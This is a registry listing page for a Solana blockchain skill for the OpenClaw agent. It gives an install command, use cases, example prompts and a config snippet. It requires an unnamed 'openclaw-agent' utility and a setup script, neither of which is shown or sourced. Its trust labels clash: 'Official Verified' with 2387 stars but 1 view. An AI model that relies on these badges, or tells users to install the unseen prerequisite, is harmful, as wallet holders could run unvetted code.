ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Efficiently interact with the Solana blockchain using the OpenClaw agent. Check balances, monitor wallets, track NFTs, and audit transactions with ease.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-7rrh8
Or

What This Skill Does

The Solana skill for OpenClaw provides a comprehensive interface for interacting with the Solana blockchain directly from your agent environment. It enables users to perform deep queries into wallet activities, including monitoring SOL balances, tracking SPL token holdings, auditing transaction history, and exploring NFT metadata. By leveraging native command-line tools like the Solana CLI and Metaboss, this skill abstracts the complexity of blockchain interaction, allowing you to fetch account data, verify transaction statuses, and manage custom RPC connections effortlessly. It is designed to work seamlessly with both Phantom and Solflare wallet addresses.

Installation

To begin, ensure you have the openclaw-agent utility installed according to your operating system requirements (Windows or macOS) as outlined in the documentation. Once the agent bridge is active, install the skill via the OpenClaw console using: clawhub install openclaw/skills/skills/hightower6eu/solana-7rrh8. After the installation, verify that your environment is configured by running the initial Solana setup script, which installs the necessary CLI dependencies and sets your default RPC to the official mainnet-beta endpoint.

Use Cases

This skill is ideal for developers, power users, and crypto enthusiasts who need to automate blockchain data collection. Common use cases include: 1) Tracking portfolio performance by monitoring token account balances programmatically. 2) Auditing transaction success rates for specific wallets. 3) Fetching metadata for NFT collections using the built-in Metaboss integration. 4) Setting up automated watchdogs for wallet address changes using the 'watch' functionality. 5) Debugging account data by switching between mainnet, devnet, and custom RPC providers.

Example Prompts

  1. "Check the current SOL balance for wallet address 5j6... and list all SPL tokens currently held in the account."
  2. "Monitor this wallet address for any new transactions and report back every 5 seconds until I tell you to stop."
  3. "Fetch the metadata for the NFT with mint address G1a... and display the token details in a readable format."

Tips & Limitations

Always ensure the openclaw-agent process is running in the background, as blockchain network requests will fail without the bridged connection. For high-frequency monitoring, be aware of RPC rate limits imposed by public endpoints; if you encounter errors, consider switching to a private or paid RPC provider. While the skill provides extensive read-only capabilities, always verify transaction signatures through official explorers before confirming sensitive financial actions.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-7rrh8": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#wallet-tracking#web3
Safety Score: 4/5

Flags: network-access, external-api, code-execution